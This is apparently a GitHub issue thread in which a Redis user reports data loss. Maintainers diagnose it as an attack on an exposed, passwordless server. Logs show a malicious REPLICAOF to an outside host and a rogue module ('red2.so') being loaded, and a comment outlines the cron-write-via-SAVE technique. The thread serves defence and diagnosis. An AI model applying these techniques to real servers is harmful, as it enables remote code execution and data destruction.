Describe the bug
The use of Redis version V6.2.4, Docker mirror, in the use of data storage and read and write data resulting in data loss
To reproduce
Expected behavior
In the use of 6.2.4 version of the storage, about 10 read and write per second, about ten minutes later will prompt 'DB saved on disk', did not prompt success, to view the data found that all Redis data does not exist.
It becomes an empty database, and everything is as good as new
Additional information
docker: 19.0.3
redis: 6.2.4
centos: 7.6
Comment From: sundb
Possibly similar to #9044.
Can you look at the info all output?
Comment From: oranagra
@warriorBrian from the logs, it looks like you're using the SAVE command (i.e. foreground save, rather than BGSAVE).
it doesn't look like the mechanism behind the periodic snapshot persistence (the save config).
the periodic saving mechanism produces these logs:
14991:M 09 Jun 2021 14:15:04.869 * 1 changes in 1 seconds. Saving...
14991:M 09 Jun 2021 14:15:04.869 * Background saving started by pid 15210
15210:C 09 Jun 2021 14:15:04.891 * DB saved on disk
15210:C 09 Jun 2021 14:15:04.891 * RDB: 0 MB of memory used by copy-on-write
14991:M 09 Jun 2021 14:15:04.969 * Background saving terminated with success
and BGSAVE command produces all of them except for the first one.
i'm not sure what is your complaint, are you complaining that the file on disk is missing? or did some keys also disappear from redis (without a restart)?
did you use any previous version of redis in that configuration? i.e. is that a regression? or could it be that something in your docker setup is causing the file to get lost?
Comment From: warriorBrian
@oranagra To prevent interference, I used a new environment, using docker-compose for startup, and the file configuration is as follows
version: "3.3"
services:
redis:
container_name: redis
image: redis:5.0.9
restart: always
ports:
- 6379:6379
volumes:
- "./redis.conf:/etc/redis.conf:ro"
- "/etc/localtime:/etc/localtime"
entrypoint: ["redis-server", "/etc/redis.conf"]
Then I started to use it normally, reading and writing data, and after about ten minutes, all the keys and values in Redis were lost
Comment From: warriorBrian
@sundb info all:
# Server
redis_version:6.2.1
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:b54db1313f408a09
redis_mode:standalone
os:Linux 3.10.0-1160.25.1.el7.x86_64 x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:c11-builtin
gcc_version:8.3.0
process_id:1
process_supervised:no
run_id:e137655b84e0d1f342c489dc8c5c62fe4f9f41ba
tcp_port:6379
server_time_usec:1623238485789277
uptime_in_seconds:8042
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:12625749
executable:/data/redis-server
config_file:/etc/redis.conf
io_threads_active:0
# Clients
connected_clients:4
cluster_connections:0
maxclients:10000
client_recent_max_input_buffer:56
client_recent_max_output_buffer:0
blocked_clients:0
tracking_clients:0
clients_in_timeout_table:0
# Memory
used_memory:937432
used_memory_human:915.46K
used_memory_rss:7360512
used_memory_rss_human:7.02M
used_memory_peak:1617184
used_memory_peak_human:1.54M
used_memory_peak_perc:57.97%
used_memory_overhead:892136
used_memory_startup:809904
used_memory_dataset:45296
used_memory_dataset_perc:35.52%
allocator_allocated:1000240
allocator_active:1331200
allocator_resident:3698688
total_system_memory:1927114752
total_system_memory_human:1.79G
used_memory_lua:37888
used_memory_lua_human:37.00K
used_memory_scripts:0
used_memory_scripts_human:0B
number_of_cached_scripts:0
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
allocator_frag_ratio:1.33
allocator_frag_bytes:330960
allocator_rss_ratio:2.78
allocator_rss_bytes:2367488
rss_overhead_ratio:1.99
rss_overhead_bytes:3661824
mem_fragmentation_ratio:8.23
mem_fragmentation_bytes:6465880
mem_not_counted_for_evict:0
mem_replication_backlog:0
mem_clients_slaves:0
mem_clients_normal:82040
mem_aof_buffer:0
mem_allocator:jemalloc-5.1.0
active_defrag_running:0
lazyfree_pending_objects:0
lazyfreed_objects:0
# Persistence
loading:0
current_cow_size:0
current_fork_perc:0.00%
current_save_keys_processed:0
current_save_keys_total:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1623235757
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:0
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:483328
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0
module_fork_in_progress:0
module_fork_last_cow_size:0
# Stats
total_connections_received:52
total_commands_processed:60218
instantaneous_ops_per_sec:0
total_net_input_bytes:1755109
total_net_output_bytes:1098843
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
expire_cycle_cpu_milliseconds:357
evicted_keys:0
keyspace_hits:24779
keyspace_misses:15039
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:662
total_forks:125
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0
tracking_total_keys:0
tracking_total_items:0
tracking_total_prefixes:0
unexpected_error_replies:0
total_error_replies:69
dump_payload_sanitizations:0
total_reads_processed:60264
total_writes_processed:60212
io_threaded_reads_processed:0
io_threaded_writes_processed:0
# Replication
role:master
connected_slaves:0
master_failover_state:no-failover
master_replid:f88134f9daef89cae97aca48bd070aa7978606f1
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
# CPU
used_cpu_sys:42.580776
used_cpu_user:18.663659
used_cpu_sys_children:0.360094
used_cpu_user_children:0.075961
used_cpu_sys_main_thread:42.452486
used_cpu_user_main_thread:18.659545
# Modules
# Commandstats
cmdstat_get:calls=39816,usec=342764,usec_per_call=8.61,rejected_calls=0,failed_calls=0
cmdstat_config:calls=146,usec=4282,usec_per_call=29.33,rejected_calls=0,failed_calls=49
cmdstat_select:calls=21,usec=99,usec_per_call=4.71,rejected_calls=0,failed_calls=0
cmdstat_command:calls=18,usec=14903,usec_per_call=827.94,rejected_calls=0,failed_calls=0
cmdstat_exists:calls=2,usec=6,usec_per_call=3.00,rejected_calls=0,failed_calls=0
cmdstat_flushall:calls=32,usec=89249,usec_per_call=2789.03,rejected_calls=0,failed_calls=0
cmdstat_cluster:calls=11,usec=104,usec_per_call=9.45,rejected_calls=0,failed_calls=11
cmdstat_ping:calls=12,usec=21,usec_per_call=1.75,rejected_calls=0,failed_calls=0
cmdstat_auth:calls=9,usec=34,usec_per_call=3.78,rejected_calls=0,failed_calls=9
cmdstat_del:calls=2,usec=10,usec_per_call=5.00,rejected_calls=0,failed_calls=0
cmdstat_save:calls=81,usec=222491,usec_per_call=2746.80,rejected_calls=0,failed_calls=0
cmdstat_set:calls=20046,usec=237230,usec_per_call=11.83,rejected_calls=0,failed_calls=0
cmdstat_scan:calls=5,usec=116,usec_per_call=23.20,rejected_calls=0,failed_calls=0
cmdstat_info:calls=17,usec=3208,usec_per_call=188.71,rejected_calls=0,failed_calls=0
# Errorstats
errorstat_ERR:count=69
# Cluster
cluster_enabled:0
# Keyspace
db0:keys=4,expires=0,avg_ttl=0
Comment From: oranagra
@warriorBrian is it 6.2.4 6.2.1 or 5.0.9? each of your comments says something different. i do see many calls to FLUSHALL in your command stats.
is it possible in some way this server is exposed to the internet without any password and someone's abusing it?
this is consistent with the pretense of SAVE calls, and CONFIG calls. someone is probably trying to write into your crontab or some other system folder.
Comment From: warriorBrian
@oranagra To repeat the error, I used three versions to verify the error, and all three versions were the same error. That's why there are three versions.
I will use public network IP to access Redis, the port is completely open, there is no password, to write, is this the reason for the problem?
Comment From: oranagra
yeah. seems that someone is trying to attack your computer though the open redis.
run a quick MONITOR redis-cli monitor session and you'll probably see what they're attempting.
Comment From: oranagra
or do a config get dbfilename to see which file they're trying to write to. and check it's contents to see if they succeeded.
Comment From: warriorBrian
@oranagra I can confirm that only I am accessing this IP at present. Do you mean that Redis thinks an attacker is accessing this IP, and the result causes this problem?
Comment From: warriorBrian
@oranagra Yesterday I used Intranet localhost for access, but Redis was still open to the public, so I turned off the safe mode. In redis.conf, after this problem occurred, I used the public IP, and wrote a loop to write to verify the problem, the problem still exists.
The strange problem is that I set up a server in the Intranet, the same configuration, read and write is not a problem, on the online access server has this problem.
Comment From: warriorBrian
@oranagra I used config get dbfilename, read and write redis is successful at the beginning, in more than ten minutes later the problem appeared. Then it quickly saves successfully, but at this time all the keys and values in Redis will not exist.
This problem occurs some time in the future, not in the near future when reading and writing is started
Comment From: oranagra
i'm not sure i follow you.
what's the value returned by config get dbfilename?
i see in the command stats 32 to FLUSHALL and 81 calls to SAVE. did you do these? if not, then i'm saying that it is likely someone connected to the open redis, and call them.
the usual pattern is that attackers try to change dbfilename to /var/spool/cron or alike, put some data in the db, and call SAVE, hoping that linux will execute his code on your machine.
Comment From: oranagra
please also do config get dir
Comment From: warriorBrian
config get dbfilename:
1) "dbfilename"
2) "dump.rdb"
config get dir:
1) "dir"
2) "/data"
Comment From: oranagra
maybe it was restarted since that abuse attempt? is it possible that the 32 calls to FLUSHDB and 81 calls to SAVE were triggered by you? if not, i suggest you either use a MONITOR to confirm, or just protect your redis with a password (and better look at some sensitive places in your system to check if they weren't compromised by an attack).
Comment From: warriorBrian
@oranagra I have been idle for a period of time without any read or write operations. His log:
1:M 09 Jun 2021 20:50:36.008 * DB saved on disk
1:M 09 Jun 2021 20:50:36.053 * DB saved on disk
1:M 09 Jun 2021 20:50:36.362 * DB saved on disk
1:M 09 Jun 2021 20:50:36.497 * DB saved on disk
1:S 09 Jun 2021 21:01:56.515 * Before turning into a replica, using my master parameters to synthesize a cached master: I may be able to synchronize with the new master with just a partial transfer.
1:S 09 Jun 2021 21:01:56.515 * REPLICAOF 194.38.20.199:8886 enabled (user request from 'id=21 addr=109.237.96.124:54182 fd=8 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=47 qbuf-free=32721 obl=0 oll=0 omem=0 events=r cmd=slaveof')
1:S 09 Jun 2021 21:01:57.378 * Connecting to MASTER 194.38.20.199:8886
1:S 09 Jun 2021 21:01:57.378 * MASTER <-> REPLICA sync started
1:S 09 Jun 2021 21:01:57.682 * Non blocking connect for SYNC fired the event.1:S 09 Jun 2021 21:01:57.986 * Master replied to PING, replication can continue...
1:S 09 Jun 2021 21:01:58.596 * Trying a partial resynchronization (request 3a82f8add111a6fb478fbacc825811ea1c31a888:1).
1:S 09 Jun 2021 21:01:58.901 * Full resync from master: ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ:1
1:S 09 Jun 2021 21:01:58.901 * Discarding previously cached master state.
1:S 09 Jun 2021 21:01:58.901 * MASTER <-> REPLICA sync: receiving 55648 bytes from master
1:S 09 Jun 2021 21:01:59.532 * MASTER <-> REPLICA sync: Flushing old data
1:S 09 Jun 2021 21:01:59.533 * MASTER <-> REPLICA sync: Loading DB in memory
1:S 09 Jun 2021 21:01:59.533 # Wrong signature trying to load DB from file
1:S 09 Jun 2021 21:01:59.533 # Failed trying to load the MASTER synchronization DB from disk
1:S 09 Jun 2021 21:02:00.392 * Connecting to MASTER 194.38.20.199:8886
1:S 09 Jun 2021 21:02:00.392 * MASTER <-> REPLICA sync started
1:S 09 Jun 2021 21:02:00.677 * Non blocking connect for SYNC fired the event.1:S 09 Jun 2021 21:02:00.961 # Error condition on socket for SYNC: Connection reset by peer
1:S 09 Jun 2021 21:02:01.399 * Connecting to MASTER 194.38.20.199:8886
1:S 09 Jun 2021 21:02:01.399 * MASTER <-> REPLICA sync started
1:S 09 Jun 2021 21:02:01.702 * Non blocking connect for SYNC fired the event.1:S 09 Jun 2021 21:02:02.005 # Error condition on socket for SYNC: Connection reset by peer
1:S 09 Jun 2021 21:02:02.405 * Connecting to MASTER 194.38.20.199:8886
1:S 09 Jun 2021 21:02:02.405 * MASTER <-> REPLICA sync started
1:S 09 Jun 2021 21:02:02.709 * Non blocking connect for SYNC fired the event.1:S 09 Jun 2021 21:02:03.013 # Error condition on socket for SYNC: Connection reset by peer
1:S 09 Jun 2021 21:02:03.410 * Connecting to MASTER 194.38.20.199:8886
1:S 09 Jun 2021 21:02:03.410 * MASTER <-> REPLICA sync started
1:S 09 Jun 2021 21:02:03.715 * Non blocking connect for SYNC fired the event.1:S 09 Jun 2021 21:02:04.019 # Error condition on socket for SYNC: Connection reset by peer
1:S 09 Jun 2021 21:02:04.311 * Module 'system' loaded from ./red2.so
1:S 09 Jun 2021 21:02:04.413 * Connecting to MASTER 194.38.20.199:8886
1:S 09 Jun 2021 21:02:04.413 * MASTER <-> REPLICA sync started
1:M 09 Jun 2021 21:02:04.702 # Setting secondary replication ID to 3a82f8add111a6fb478fbacc825811ea1c31a888, valid up to offset: 1. New replication ID is 99cfdf93777e15d2795e52eb550df39e1e74e75d
1:M 09 Jun 2021 21:02:04.702 * MASTER MODE enabled (user request from 'id=21 addr=109.237.96.124:54182 fd=8 name= age=8 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=34 qbuf-free=32734 obl=0 oll=0 omem=0 events=r cmd=slaveof')
1:M 09 Jun 2021 21:02:37.085 * Module system unloaded
1:M 09 Jun 2021 21:04:48.455 * DB saved on disk
1:M 09 Jun 2021 21:04:48.484 * DB saved on disk
1:M 09 Jun 2021 21:04:48.653 * DB saved on disk
1:M 09 Jun 2021 21:04:48.715 * DB saved on disk
Comment From: oranagra
@warriorBrian don't you think it's clear that someone is attacking your redis??? he even loaded a redis-module named "system"? i'd consider that computer compromised, disconnect it from my LAN, and wipe it, and even, consider my LAN compromised!
Comment From: warriorBrian
@oranagra I think this should be the mechanism of redis. I think someone is attacking. In fact, only I am using it. I try to use the password to test whether this problem will occur. Thank you very much.
Comment From: oranagra
There is a mechanism in redis to discourage people from exposing an unprotected server, it seems you turned it off. https://github.com/redis/redis/blob/8a86bca5ed09094b561284fcb5b1fc416a4016dc/redis.conf#L77-L94
Comment From: sundb
@warriorBrian It is best to disable external access ports.
Comment From: warriorBrian
@sundb @oranagra I will try to use the protected mode and set the password to test the occurrence of the problem, thank you very much!
Comment From: warriorBrian
@oranagra I found these logs in Monitor, which indicated that Redis had cleared all of my data, I used an Intranet connection and enabled protected mode.
I found that he had executed flushall command and would empty all my keys. After clearing them, there was no action to restore them
Comment From: sundb
@warriorBrian I'm not sure I fully understand what you mean. Are you saying you're still under attack? Or that you want to recover the erased data?
Comment From: warriorBrian
@sundb I opened the Intranet and used the LAN to access it, but it was not open to the outside. I started the protected mode, and I did not read or write data. After a few minutes, I used redis-cli monitor and found that he had executed flushall, which made me confused
Comment From: warriorBrian
I didn't do any read-write operations on Redis, but I found that Redis will automatically perform the flushall operation, which will empty all my keys. I'm not sure why.
Comment From: sundb
@warriorBrian Look at the client list and see if the client's ip is from the intranet, if it is a LAN, then you better add auth.
Comment From: oranagra
@warriorBrian this system was already compromised (hacked). if i were you, i would stop worrying about the data that got lost, and start worrying about what the other damage the attacker caused and what it gained access to.
in the logs you posted earlier we see the attacker's IP address (109.237.96.124), and we see that he succeeded in running his code on your machine (Module 'system' loaded from ./red2.so), so this machine, and anything else it can freely access should be considered compromised and wiped (that's what i would do).
Comment From: warriorBrian
@oranagra This server is an online service, I will re-install the system, I think the problem should have occurred in a scanner or the place where the vulnerability was injected, I will continue to observe the problem, I set the access password to protect my server